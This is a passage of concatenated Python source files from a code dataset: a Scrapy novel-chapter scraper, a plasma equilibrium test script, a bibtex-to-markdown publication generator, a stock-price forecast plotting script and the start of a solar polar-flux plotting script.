= BeautifulSoup(response.text, 'lxml').find(\n 'p', class_='btnlinks').find('a', class_='read')['href']\n # 获取小说的编号\n name_id = str(bash_url)[-6:-1].replace('/', '')\n # 将数据存入item对应的字段\n item['serialstatus'] = str(serialstatus).strip()\n item['serialnumber'] = str(serialnumber).strip()\n item['category'] = str(category).replace('/', '')\n item['author'] = str(author).replace('/', '').strip()\n item['name_id'] = name_id\n # DingdianScrapyItem结构的数据都已获取,返回一个item的可迭代对象iterable,用于pipelines,并继续执行\n yield item\n # 请求章节列表的地址,response由self.get_chapter处理\n yield Request(\n url=bash_url,\n callback=self.get_chapter,\n meta={'name_id': name_id})\n\n def get_chapter(self, response):\n \"\"\"\n 正则获取所有的章节地址和名字\n 遍历结果,并根据数据库去重\n 不存在则继续请求章节内容\n \"\"\"\n # 正则表达式提取每个章节的URL\n urls = re.findall(\n r'(.*?)', response.text)\n # scrapy是异步的,所以用自己的计数器来保持小说章节的顺序\n num = 0\n # 遍历正则结果的group\n for url in urls:\n num += 1\n # 获取的url[0]为章节的id.html格式,需拼接完整的URL\n chapterurl = response.url + url[0]\n # url[1]第二个数据为chaptername\n chaptername = url[1]\n # 根据数据库判定chapterurl是否存在\n rets = Sql.select_chapter(chapterurl)\n # 若结果为1则已经存在\n if rets[0] == 1:\n print('章节已经存在了')\n pass\n # 否则继续请求章节的内容\n else:\n yield Request(chapterurl,\n callback=self.get_chaptercontent,\n meta={'num': num,\n 'name_id': response.meta['name_id'],\n 'chaptername': chaptername,\n 'chapterurl': chapterurl})\n\n def get_chaptercontent(self, response):\n \"\"\"\n 实例DcontentItem,用于存放章节相关的信息及内容\n 直接return结果,一次完整的过程完成返回最终结果,用于pipelines\n \"\"\"\n # 定义的另外一个scrapy数据结构DcontentItem用于存放章节内容及相关信息\n item = DcontentItem()\n # 章节的计数器结果\n item['num'] = response.meta['num']\n # 还是小说编号,非章节编号\n item['id_name'] = response.meta['name_id']\n # 章节名字\n item['chaptername'] = str(\n response.meta['chaptername']).replace('\\xa0', '')\n # 章节地址\n item['chapterurl'] = response.meta['chapterurl']\n # 提取章节内容\n content = BeautifulSoup(response.text, 'lxml').find(\n 'dd', id='contents').get_text()\n item['chaptercontent'] = str(content).replace('\\xa0', '')\n # 返回类型为DcontentItem类型的item,不需要yield,某一次完成的章节内容获取完成\n return item\n","sub_path":"spider/dingdian_scrapy/dingdian_scrapy/spiders/dingdian.py","file_name":"dingdian.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"368473904","text":"from __future__ import print_function, division, absolute_import, unicode_literals\nfrom pleiades.helpers import *\nfrom pleiades.core import ZSymmCoilSet\nfrom pleiades.wipplsystems import BRB,Dipole\nfrom pleiades.grids import RectGrid\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib import ticker\nfrom matplotlib.collections import PatchCollection\nimport matplotlib.colors as colors\nimport os\nfrom pleiades.math import get_gpsi\nfrom pleiades.eq_solve import compute_equilibrium\nfrom pleiades.io import write_eqdsk\n\n# build grid\nRZgrid = RectGrid((0,1,257),(-.5,.5,257))\nR,Z = RZgrid.R, RZgrid.Z\n\n# build brb vessel and specify current values, patch masks, etc\ntrex_cur = 2000\nmir_cur = 80000*1.2\n#mir_cur = 160000\nbrb = BRB()\n#brb.trex.Ncoil.z0 = .4\n#brb.trex.Scoil.z0 = -.4\nbrb.trex.currents = [trex_cur,trex_cur]\nbrb.ltrx.currents = [0,0]\nbrb.vessel_mags.currents = [0,0,0]\nmirror_set = ZSymmCoilSet(r0=0.15,z0=0.55,nr=11,nz=5,dr=.01,dz=.01)\nbrb.add_component(mirror_set,\"mirrors\")\nbrb.mirrors.currents = [mir_cur,mir_cur]\n\n# set the brb grid (does all greens functions calculations right here)\nbrb.grid = RZgrid\n\n# force psi_lim through rlim1,zlim1 and rlim2,zlim2\nrlim1,zlim1 = 0.08,0.5\nrlim2,zlim2 = 0.6,0.0\nr1idx,z1idx = np.abs(R[0,:]-rlim1).argmin(), np.abs(Z[:,0]-zlim1).argmin()\nr2idx,z2idx = np.abs(R[0,:]-rlim2).argmin(), np.abs(Z[:,0]-zlim2).argmin()\ngm1,gm2 = np.sum(brb.mirrors.gpsi,axis=-1).reshape(R.shape)[z1idx,r1idx], np.sum(brb.mirrors.gpsi,axis=-1).reshape(R.shape)[z2idx,r2idx]\ngc1,gc2 = np.sum(brb.trex.gpsi,axis=-1).reshape(R.shape)[z1idx,r1idx], np.sum(brb.trex.gpsi,axis=-1).reshape(R.shape)[z2idx,r2idx]\ngp1,gp2 = 0, 0\niplas = 0\nnew_trex_cur = -((gm1-gm2)*brb.mirrors.currents[0] + (gp1-gp2)*iplas)/(gc1 - gc2)\nprint(new_trex_cur)\nbrb.trex.currents = [new_trex_cur,new_trex_cur]\n\n# get desired field quantities from brb object\nB = np.sqrt(brb.BR**2+brb.BZ**2)\nBR = brb.BR\nBZ = brb.BZ\npsi = brb.psi\npsi_lim = locs_to_vals(R,Z,psi,[(rlim1,zlim1)])[0]\npsi_space = np.linspace(0,psi_lim,11)\n\n# setup pressure profile and compute P0 for a given desired initial beta\na = .6\nalpha = 2.0\nbeta0 = .00001\nB0 = locs_to_vals(R,Z,B,[(0,0)])[0]\nP0 = beta0*B0**2/(2*4*np.pi*1E-7)\nprint(\"pressure \", P0)\n# build pressure function of cylindrical radius\nPfunc = lambda x: P0*(1-(x/a)**2)**alpha if x < a else 0\n# get greens function for plasma currents\ngplas = get_gpsi(R,Z)\n# compute equilibrium\npsieq,plas_currents,pfit = compute_equilibrium(R,Z,Pfunc,psi,gplas,maxiter=400,plotit=False)\nwrite_eqdsk(R,Z,psi,plas_currents,\"mfnpeqdsk.txt\",\"MFNP_Mirror Equilib\")\nP = pfit(psi.flatten()).reshape(psi.shape)\njphi = plas_currents/((R[0,1]-R[0,0])*(Z[1,0]-Z[0,0]))\n\nfig,ax = plt.subplots()\ncf = ax.contourf(R,Z,jphi,101)\ncs = ax.contour(R,Z,psieq,psi_space,colors=\"k\",lw=2)\nfor clev in psi_space:\n flpts = get_fieldlines(cs,clev,start_coord=(0.05,.5),end_coord=(0.05,-0.5),clockwise=True)\n ax.plot(flpts[:,0],flpts[:,1],\"bo\")\n ax.plot(flpts[0,0],flpts[0,1],\"go\")\n ax.plot(flpts[-1,0],flpts[-1,1],\"ro\")\n\nplt.colorbar(cf)\nplt.show()\n\n\n#### Plotting \n# plot slice of Bz as function of Z at R=0\nridx = np.abs(R[0,:]).argmin()\nplt.plot(Z[:,ridx],BZ[:,ridx])\nplt.plot(Z[:,ridx],BR[:,ridx])\nplt.show()\n\n# plot BRB with patches and stuff\nfig,ax = plt.subplots(figsize=(10,8))\ncf = ax.contourf(R,Z,B,101,cmap=\"rainbow\",locator=ticker.LogLocator(),zorder=0)\ncs = ax.contour(R,Z,psi,51,colors='k',lw=2,zorder=1)\ncs1 = ax.contour(R,Z,psieq,51,colors='g',lw=2,zorder=1)\ncs = ax.contour(R,Z,psi,(psi_lim,),colors='r',lw=2,zorder=1)\ncs = ax.contour(R,Z,psi,(7629.87E-8,),colors='b',lw=2,zorder=1)\ncbar = fig.colorbar(cf)\ncbar.set_label(\"B (G)\",fontsize=16)\nax.set_xlim(0,1.0)\nax.set_ylabel(\"Z (m)\")\nax.set_xlabel(\"R (m)\")\nax.set_ylim(-.5,.5)\nax.set_aspect('equal')\npatches = brb.patches\nax.add_collection(PatchCollection(patches,match_original=True))\nplt.show()\n","sub_path":"tests/eq_tester.py","file_name":"eq_tester.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"173414765","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Publications markdown generator for academicpages\n#\n# Takes a set of bibtex of publications and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)).\n#\n# The core python code is also in `pubsFromBibs.py`.\n# Run either from the `markdown_generator` folder after replacing updating the publist dictionary with:\n# * bib file names\n# * specific venue keys based on your bib file preferences\n# * any specific pre-text for specific files\n# * Collection Name (future feature)\n#\n# TODO: Make this work with other databases of citations,\n# TODO: Merge this with the existing TSV parsing solution\n\n\nfrom pybtex.database.input import bibtex\nimport pybtex.database.input.bibtex\nfrom time import strptime\nimport string\nimport html\nimport os\nimport re\n\n# Build a .bib file from the individual bib entries in files/bib:\nfrom pathlib import Path\nparentdir = str(Path(os.getcwd()).parent.absolute())\nwith open(\"proceedings.bib\", \"w\") as procfile, open(\"pubs.bib\", \"w\") as pubsfile, open (\"dissertation.bib\", \"w\") as dissertationfile:\n for bib_file in os.listdir(parentdir + '/files/bib'):\n with open(parentdir + '/files/bib/' + bib_file, 'r') as bf:\n lines = bf.readlines()\n if lines[0].strip().startswith('@inproceedings'):\n procfile.writelines(lines)\n elif lines[0].strip().startswith('@article'):\n pubsfile.writelines(lines)\n elif lines[0].strip().startswith('@phdthesis'):\n dissertationfile.writelines(lines)\n\n#todo: incorporate different collection types rather than a catch all publications, requires other changes to template\npublist = {\n \"proceeding\": {\n \"file\" : \"proceedings.bib\",\n \"authorkey\": \"author\",\n \"venuekey\": \"booktitle\",\n \"venue-pretext\": \"\",\n \"links\": \"\",\n \"collection\" : {\"name\":\"publications\",\n \"permalink\":\"/publication/\"}\n\n },\n \"journal\":{\n \"file\": \"pubs.bib\",\n \"authorkey\": \"author\",\n \"venuekey\" : \"journal\",\n \"venue-pretext\" : \"\",\n \"collection\" : {\"name\":\"publications\",\n \"permalink\":\"/publication/\"}\n },\n \"dissertation\":{\n \"file\": \"dissertation.bib\",\n \"authorkey\": \"author\",\n \"venuekey\" : \"school\",\n \"venue-pretext\" : \"\",\n \"collection\" : {\"name\":\"publications\",\n \"permalink\":\"/publication/\"}\n }\n}\n\nhtml_escape_table = {\n \"&\": \"&\",\n '\"': \""\",\n \"'\": \"'\"\n }\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c,c) for c in text)\n\n\nfor pubsource in publist:\n parser = bibtex.Parser()\n bibdata = parser.parse_file(publist[pubsource][\"file\"])\n\n #loop through the individual references in a given bibtex file\n for bib_id in bibdata.entries:\n #reset default date\n pub_year = \"1900\"\n pub_month = \"01\"\n pub_day = \"01\"\n\n b = bibdata.entries[bib_id].fields\n\n try:\n pub_year = f'{b[\"year\"]}'\n\n #todo: this hack for month and day needs some cleanup\n if \"month\" in b.keys():\n if(len(b[\"month\"])<3):\n pub_month = \"0\"+b[\"month\"]\n pub_month = pub_month[-2:]\n elif(b[\"month\"] not in range(12)):\n tmnth = strptime(b[\"month\"][:3],'%b').tm_mon\n pub_month = \"{:02d}\".format(tmnth)\n else:\n pub_month = str(b[\"month\"])\n if \"day\" in b.keys():\n pub_day = str(b[\"day\"])\n\n\n pub_date = pub_year+\"-\"+pub_month+\"-\"+pub_day\n\n #strip out {} as needed (some bibtex entries that maintain formatting)\n clean_title = b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\").replace(\" \",\"-\")\n\n url_slug = re.sub(\"\\\\[.*\\\\]|[^a-zA-Z0-9_-]\", \"\", clean_title)\n url_slug = url_slug.replace(\"--\",\"-\")\n\n md_filename = (str(pub_date) + \"-\" + url_slug + \".md\").replace(\"--\",\"-\")\n html_filename = (str(pub_date) + \"-\" + url_slug).replace(\"--\",\"-\")\n\n #Build Citation from text\n citation = \"\"\n\n #citation authors - todo - add highlighting for primary author?\n authors = \"\"\n for author in bibdata.entries[bib_id].persons[\"author\"]:\n authors = authors+\" \"+author.first_names[0]+\" \"+author.last_names[0].replace('{', '').replace('}', '')+\", \"\n authors = authors[:-2]\n citation += authors\n\n #citation title\n citation = citation + \"\\\"\" + html_escape(b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")) + \".\\\"\"\n\n #add venue logic depending on citation type\n venue = publist[pubsource][\"venue-pretext\"]+b[publist[pubsource][\"venuekey\"]].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")\n\n citation = citation + \" \" + html_escape(venue)\n citation = citation + \", \" + pub_year + \".\"\n\n\n ## YAML variables\n md = \"---\\ntitle: \\\"\" + html_escape(b[\"title\"].replace(\"{\", \"\").replace(\"}\",\"\").replace(\"\\\\\",\"\")) + '\"\\n'\n\n md += \"\"\"collection: \"\"\" + publist[pubsource][\"collection\"][\"name\"]\n\n md += \"\"\"\\npermalink: \"\"\" + publist[pubsource][\"collection\"][\"permalink\"] + html_filename\n\n note = False\n if \"note\" in b.keys():\n if len(str(b[\"note\"])) > 5:\n md += \"\\nexcerpt: '\" + html_escape(b[\"note\"]) + \"'\"\n note = True\n\n md += \"\\ndate: \" + str(pub_date)\n\n md += \"\\nyear: \" + str(pub_year)\n\n md += \"\\nauthor: '\" + html_escape(authors) + \"'\"\n\n md += \"\\nvenue: '\" + html_escape(venue) + \"'\"\n\n if 'abstract' in bibdata.entries[bib_id].fields:\n md += \"\\nabstract: '\" + html_escape(bibdata.entries[bib_id].fields['abstract']) + \"'\"\n\n url = False\n if \"url\" in b.keys():\n if len(str(b[\"url\"])) > 5:\n md += \"\\npaperurl: '\" + b[\"url\"] + \"'\"\n url = True\n\n # Check for the availability of pdf, slides, video, code\n paper_available = False\n paper_url = \"\"\n paperdir = parentdir + '/files/papers'\n if bib_id + '.txt' in os.listdir(paperdir):\n paper_available = True\n paper_url = open(paperdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + '.pdf' in os.listdir(paperdir):\n paper_available = True\n paper_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/papers/{id}.pdf'.format(id=bib_id)\n else:\n print(\"WARNING: no paper pdf available for\", bib_id)\n\n slides_available = False\n slides_url = \"\"\n slidesdir = parentdir + '/files/slides'\n if bib_id + '.txt' in os.listdir(slidesdir):\n slides_available = True\n slides_url = open(slidesdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + '.pdf' in os.listdir(slidesdir):\n slides_available = True\n slides_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/slides/{id}.pdf'.format(id=bib_id)\n else:\n print(\"WARNING: no slides pdf available for\", bib_id)\n\n video_available = False\n video_url = \"\"\n videodir = parentdir + '/files/video'\n if bib_id + '.txt' in os.listdir(videodir):\n video_available = True\n video_url = open(videodir + '/' + bib_id + '.txt').readlines()[0].strip()\n\n poster_available = False\n poster_url = \"\"\n posterdir = parentdir + '/files/posters'\n if bib_id + '.txt' in os.listdir(posterdir):\n poster_available = True\n poster_url = open(posterdir + '/' + bib_id + '.txt').readlines()[0].strip()\n elif bib_id + '.pdf' in os.listdir(posterdir):\n poster_available = True\n poster_url = 'https://github.com/hanxiao0607/hanxiao0607.github.io/raw/master/files/posters/{id}.pdf'.format(id=bib_id)\n\n code_available = False\n code_url = \"\"\n codedir = parentdir + '/files/code'\n if bib_id + '.txt' in os.listdir(codedir):\n code_available = True\n code_url = open(codedir + '/' + bib_id + '.txt').readlines()[0].strip()\n\n # Create links for these materials\n available_material = []\n if paper_available:\n available_material.append(('pdf', paper_url))\n if slides_available:\n available_material.append(('slides', slides_url))\n if poster_available:\n available_material.append(('poster', poster_url))\n if video_available:\n available_material.append(('video', video_url))\n if code_available:\n available_material.append(('code', code_url))\n available_material.append(('bib', 'https://github.com/hanxiao0607/hanxiao0607.github.io/tree/master/files/bib/{id}.bib'.format(id=bib_id)))\n links = \"\\nlinks: \"\n # links += \", \".join([\"\" + text + \"\" for (text, text_url) in available_material])\n links_list = []\n for (text, text_url) in available_material:\n if text_url.endswith('.bib') or text_url.endswith('.pdf'):\n links_list.append(\"\" + text + \"\")\n else:\n links_list.append(\"\" + text + \"\")\n links += \", \".join(links_list)\n links += \"\"\n # links = \"\\nlinks: \\[\"\n # links += \", \".join([\"[\" + text + \"](\" + text_url + \"){:target=\\\"_blank\\\"}\" for (text, text_url) in available_material])\n # links += \"\\]\"\n\n md += links\n\n # links = html_escape(links)\n # publist[pubsource][links] = links\n # md += \"\\ncitation: '\" + html_escape(citation) + \"'\"\n\n md += \"\\n---\"\n\n\n ## Markdown description for individual page\n if note:\n md += \"\\n\" + html_escape(b[\"note\"]) + \"\\n\"\n\n # if url:\n # md += \"\\n[Access paper here](\" + b[\"url\"] + \"){:target=\\\"_blank\\\"}\\n\"\n # else:\n # md += \"\\nUse [Google Scholar](https://scholar.google.com/scholar?q=\"+html.escape(clean_title.replace(\"-\",\"+\"))+\"){:target=\\\"_blank\\\"} for full citation\"\n\n\n\n md_filename = os.path.basename(md_filename)\n\n with open(\"../_publications/\" + md_filename, 'w') as f:\n f.write(md)\n # f.write(links)\n print(f'SUCESSFULLY PARSED {bib_id}: \\\"', b[\"title\"][:60],\"...\"*(len(b['title'])>60),\"\\\"\")\n # field may not exist for a reference\n except KeyError as e:\n print(f'WARNING Missing Expected Field {e} from entry {bib_id}: \\\"', b[\"title\"][:30],\"...\"*(len(b['title'])>30),\"\\\"\")\n continue\n","sub_path":"markdown_generator/pubsFromBib.py","file_name":"pubsFromBib.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"242270965","text":"from data_ops import *\nfrom model import *\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nimport datetime as dt\nimport pandas as pd\nimport os\nimport json\n\nmatplotlib.rc('font',**{'family':'monospace'})\nmatplotlib.rcParams['mathtext.fontset'] = 'dejavusans'\n\nif __name__ == \"__main__\":\n if (len(sys.argv) == 3):\n\n stock_name = sys.argv[1]\n model_name = sys.argv[2]\n\n view_length_1 = 14\n view_length_2 = 60\n evaluate_performance = True\n\n normalize = True\n interval_min = -3*356\n interval_max = None\n\n abs_dir = os.path.dirname(os.path.realpath(__file__))\n data_columns = [\"Close\", \"Open\", \"High\", \"Low\", \"Volume\"]\n window_size = 60\n\n show = False\n\n color_lines = ['#1f77b4', '#2ca02c', '#ff7f0e', '#d62728', '#9467bd', '#8c564b', '#bcbd22']\n color_palette = {\"blue\":\"#1f77b4\",\"wine_red\":\"#794044\",\"green\":\"#2ca02c\"}\n\n\n\n datasets = get_datasets(stock_name, data_columns, interval_min=interval_min,interval_max=interval_max)\n print(datasets[0].tail())\n\n data_test = [pd.DataFrame(ds).values for ds in datasets]\n\n dataframe = pd.DataFrame(datasets[0])\n data_dates = pd.to_datetime(dataframe.index.values, format='%Y-%m-%d')\n data_dates = [d.date() for d in data_dates]\n\n model = Model(model_name)\n model.load()\n\n x_test, y_test, y_test_s = model.window_data(data_test, window_size, False)\n\n real_stock_price = np.transpose(y_test_s)[0]\n\n fig = plt.figure(figsize=(16,7))\n\n ax1 = plt.subplot2grid((3, 6), (0, 0), colspan=3, rowspan=3)\n ax2 = plt.subplot2grid((3, 6), (0, 3), colspan=3, rowspan=3)\n\n today_date = data_dates[-1].strftime(\"%d.%m.%Y\")\n ax1.plot([data_dates[-1]], [real_stock_price[-1]], 'o', label=\"Heute - \"+today_date, color=color_palette[\"green\"], zorder=10)\n ax2.plot([data_dates[-1]], [real_stock_price[-1]], 'o', label=\"Heute - \"+today_date, color=color_palette[\"green\"], zorder=10)\n\n ax1.plot(data_dates[-view_length_1:], real_stock_price[-view_length_1:],'-', label ='bisheriger Preisverlauf',color=color_palette[\"blue\"])\n ax1.plot(data_dates[-view_length_1:], real_stock_price[-view_length_1:], ':', label ='gefilterter Preisverlauf', color=color_palette[\"blue\"], alpha=0.7)\n ax2.plot(data_dates[-view_length_2:], real_stock_price[-view_length_2:],'-', label ='bisheriger Preisverlauf',color=color_palette[\"blue\"])\n ax2.plot(data_dates[-view_length_2:], real_stock_price[-view_length_2:], ':', label ='gefilterter Preisverlauf', color=color_palette[\"blue\"], alpha=0.7)\n\n main_prediction = []\n #2 week plot\n prediction_length = 7\n for p in range(2):\n pos = p\n x_init = y_test[-pos - 1]\n predicted_stock_price = model.predict_sequence(x_init, normalize, prediction_length)[:,0]\n predicted_stock_price = np.insert(predicted_stock_price,0, y_test_s[-pos - 1][0])\n prediction_dates = [data_dates[-pos - 1]]\n for j in range(1, prediction_length + 1):\n prediction_dates.append(prediction_dates[j - 1] + dt.timedelta(days=1))\n delta_days = (data_dates[- 1] - data_dates[-pos - 1]).days\n\n #for later error tube\n if(p==0):\n main_prediction = [prediction_dates,np.array(predicted_stock_price)]\n ax1.plot(prediction_dates, predicted_stock_price, '--',\n label=str(prediction_length) + '-Tage Vorhersage vor '+str(delta_days)+' Tagen', color=color_lines[1 + p], zorder=5)\n zorder=5\n\n relative_prediction_positions = [i * 7 for i in range(0, 4)] # [0,5,10,15,20,30,35,40]\n prediction_lengths = [7 for r in range(len(relative_prediction_positions))] + [30]\n relative_prediction_positions = relative_prediction_positions + [0]\n\n for i in range(len(relative_prediction_positions)):\n pos = relative_prediction_positions[i]\n prediction_length = prediction_lengths[i]\n\n print(\"predicting \"+ str(prediction_length) +\" days from \" + str(pos) + \" days ago\")\n\n # Getting the predicted stock price\n\n #predict test by looking at last window_size entries of dataset_total\n x_init = y_test[-pos - 1]\n\n predicted_stock_price = model.predict_sequence(x_init, normalize, prediction_length)[:,0]\n predicted_stock_price = np.insert(predicted_stock_price,0, y_test_s[-pos - 1][0])\n\n #predicted_stock_price = sc.inverse_transform(np.reshape(predicted_stock_price,(-1,1)))\n\n prediction_dates = [data_dates[-pos-1]]\n for j in range(1,prediction_length+1):\n prediction_dates.append(prediction_dates[j-1] + dt.timedelta(days=1))\n\n #print(real_stock_price[-1],predicted_stock_price)\n\n delta_days = (data_dates[-1] - data_dates[-pos - 1]).days\n ax2.plot(prediction_dates, predicted_stock_price,\n '--', label=str(prediction_length) + '-Tage Vorhersage vor ' + str(delta_days) + \" Tagen\", color = color_lines[1 + i], zorder=zorder)\n zorder =0\n # Visualising the results\n fig.suptitle(stock_name, fontweight='bold',y=1.05,fontsize=20)\n ax1.set_title(\"letzte 2 Wochen\",fontsize=14)\n ax2.set_title(\"letzte \" + str(view_length_2) + \" Tage\",fontsize=14)\n ax1.set_xlabel('Datum')\n ax2.set_xlabel('Datum')\n ax1.set_ylabel('Preis')\n ax2.set_ylabel('Preis')\n ax1.legend(loc=0)\n ax2.legend(loc=0)\n\n props = dict(boxstyle='round,pad=1', facecolor=color_palette[\"blue\"],edgecolor=color_palette[\"blue\"], alpha=0.5)\n\n if evaluate_performance:\n prediction_sign_rates, prediction_mean, prediction_error = model.evaluate_prediction(y_test, real_stock_price, 30, normalize, 7)\n print(\"prediction sign rate \",prediction_sign_rates)\n print(\"prediction mean \",prediction_mean)\n print(\"prediction errors \", prediction_error)\n\n prediction_range = np.arange(7)\n errorinfo = \"Vorhersage Info: \\n\"\n\n #col_labels = [\"Tage\", \"Trend\", r\"$\\pm$\",r\"$\\updownarrow$\"]\n #row_labels = [str(i+1) for i in prediction_range]\n #plt.rc('text', usetex=True)\n #table = r\"\\begin{tabular}{ c | c | c | c } \"+ col_labels[0] + r\" & \" + col_labels[1] + r\" & \" + col_labels[2] + r\" & \" + col_labels[3] + r\" \\\\\\hline \"\n\n for i in prediction_range:\n #table+= row_labels[i] + \" & {0:.1f}\".format(prediction_mean[i] * 100.)+ \" & {0:.1f}\".format(prediction_error[i] * 100.)+ \" & {0:.1f}\".format(prediction_sign_rates[i] * 100.)\n errorinfo += r\"$\\delta_\" + str(i + 1) + \"=\" + \"{0:.1f}\".format(prediction_mean[i] * 100.) + \\\n r\"\\pm\" + \"{0:.1f}\".format(prediction_error[i] * 100.) + \"\\% \\sim \" + \"{0:.1f}\".format(prediction_sign_rates[i]* 100.) + \"\\%$\"\n if (i < len(prediction_sign_rates) - 1):\n #table+=r\" \\\\\\hline \"\n errorinfo += \"\\n\"\n\n #table += r\" \\end{tabular}\"\n #table = r'''\\begin{tabular}{ c | c | c | c } & col1 & col2 & col3 \\\\\\hline row1 & 11 & 12 & 13 \\\\\\hline row2 & 21 & 22 & 23 \\\\\\hline row3 & 31 & 32 & 33 \\end{tabular}'''\n ax2.text(1.05, 0.5, errorinfo, transform=ax2.transAxes, fontsize=12,\n verticalalignment='top', bbox=props)\n #plt.rc('text', usetex=False)\n prediction_error = np.insert(prediction_error,0,0)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-3*prediction_error),main_prediction[1]*(1+3*prediction_error),color=color_palette[\"green\"], alpha=.1)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-2*prediction_error),main_prediction[1]*(1+2*prediction_error),color=color_palette[\"green\"], alpha=.2)\n ax1.fill_between(main_prediction[0],main_prediction[1]*(1-prediction_error),main_prediction[1]*(1+prediction_error),color=color_palette[\"green\"], alpha=.3)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - 3 * prediction_error),\n main_prediction[1] * (1 + 3 * prediction_error), color=color_palette[\"green\"], alpha=.1)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - 2 * prediction_error),\n main_prediction[1] * (1 + 2 * prediction_error), color=color_palette[\"green\"], alpha=.2)\n ax2.fill_between(main_prediction[0], main_prediction[1] * (1 - prediction_error),\n main_prediction[1] * (1 + prediction_error), color=color_palette[\"green\"], alpha=.3)\n\n ax2.text(1.05, 0.08, \"Modell: \\n\" + model_name, transform=ax2.transAxes, fontsize=10,\n verticalalignment='top', bbox=props)\n\n timestamp = dt.datetime.now().strftime(\"%d.%m.%Y / %H:%M:%S\")\n ax2.text(1.05, -0.05, \"Letzte Aktualisierung:\\n\" + timestamp, transform=ax2.transAxes, fontsize=10,\n verticalalignment='top', bbox=props)\n\n ax1.spines['top'].set_visible(False)\n ax2.spines['top'].set_visible(False)\n ax1.spines['right'].set_visible(False)\n ax2.spines['right'].set_visible(False)\n ax1.spines['bottom'].set_visible(False)\n ax2.spines['bottom'].set_visible(False)\n ax1.spines['left'].set_visible(False)\n ax2.spines['left'].set_visible(False)\n\n ax1.margins(0)\n ax2.margins(0)\n ax1.set_ylim(ax1.get_ylim()[0], ax1.get_ylim()[1] * 1.02)\n ax2.set_ylim(ax2.get_ylim()[0], ax2.get_ylim()[1] * 1.02)\n\n ax1.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m.%Y'))\n ax2.xaxis.set_major_formatter(mdates.DateFormatter('%d.%m.%Y'))\n ax1.xaxis.set_major_locator(mdates.DayLocator(interval=int(view_length_2 / 7)))\n ax1.xaxis.set_minor_locator(mdates.DayLocator(interval=1))\n ax2.xaxis.set_major_locator(mdates.DayLocator(interval=int(view_length_2 / 7)))\n ax2.xaxis.set_minor_locator(mdates.DayLocator(interval=1))\n #plt.gcf().autofmt_xdate()\n plt.setp(plt.xticks()[1], rotation=30, ha='right')\n fig.tight_layout()\n ax1.grid(True,'major',ls='--',lw=.8,c='black',alpha=.3)\n ax1.grid(True,'minor',ls=':',lw=.5,c='k',alpha=.3)\n ax2.grid(True,'major',ls='--',lw=.8,c='black',alpha=.3)\n ax2.grid(True,'minor',ls=':',lw=.5,c='k',alpha=.3)\n\n ax1.fill_between(data_dates[-view_length_1:], ax1.get_ylim()[0], real_stock_price[-view_length_1:],\n color=color_palette[\"blue\"], alpha=.3)\n ax2.fill_between(data_dates[-view_length_2:], ax2.get_ylim()[0], real_stock_price[-view_length_2:],\n color=color_palette[\"blue\"], alpha=.3)\n\n\n plt.savefig(os.path.join(abs_dir, \"figs/\" + stock_name + \"_\" + str(view_length_2) + \".png\"),bbox_inches='tight',dpi=100)\n if(show):\n plt.show()\n else:\n plt.close()\n print(\"Test for \" + stock_name +\" with model \" + model_name + \" for \" + str(view_length_2) + \" days done\")\n","sub_path":"main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":11333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"156821374","text":"\"\"\"This is a script that reads in h5 files and plots the instruments\neach a different color.\"\"\"\nimport pandas as pd\nimport numpy as np\nimport datetime as dt\nimport matplotlib.pyplot as plt\nfrom uncertainty import Measurement as M\n\n#Plot Northern Hemisphere\ndef pf1(c):\n plt.subplot(211)\n plt.plot(date, normflux_n, color = c, marker = '.', linestyle = 'None')\n plt.axis([dt.datetime(1976,1,1), dt.datetime(2016,7,5), -3e22, 3e22])\n plt.xlabel('Year')\n plt.ylabel('Total Signed Flux (Mx)')\n plt.title('North Pole (above $65^\\circ$)')\n\n#Plot Southern Hemisphere\ndef pf2(c):\n plt.subplot(212)\n plt.plot(date, normflux_s, color = c, marker = '.', linestyle = 'None')\n plt.axis([dt.datetime(1976,1,1), dt.datetime(2016,7,5), -3e22, 3e22])\n plt.xlabel('Year')\n plt.ylabel('Total Signed Flux (Mx)')\n plt.title('South Pole (below $65^\\circ$)')\n\n\nfiles = ['512.h5', 'SPMG.h5', 'MDI.h5', 'hmi.h5']\n#files = [\"PF_data1976-01-13_1993-04-09.csv\", \"PF_data1976-01-13_1993-04-11.csv\"]\ncarr = ['red', 'yellow', 'green', 'blue']\n#data = [pd.read_csv(files[0]), pd.read_csv(files[1]), pd.read_csv(files[2]), pd.read_csv(files[3])]\nj = 0\n\nfor f in files:\n hdf = pd.read_hdf(f)\n date = hdf['date']\n visarea_n = np.array([x.v for x in hdf['visarea_n'].values])\n visarea_s = np.array([x.v for x in hdf['visarea_s'].values])\n maxarea = 2*np.pi*6.95508e10**2*(1-np.cos(np.deg2rad(90-75))) \n pfNorth = np.array([x.v for x in 